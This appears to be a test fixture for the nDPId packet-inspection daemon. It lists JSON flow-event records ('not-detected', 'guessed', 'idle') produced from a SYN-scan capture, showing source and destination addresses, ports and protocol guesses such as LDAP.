-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","ndpi": 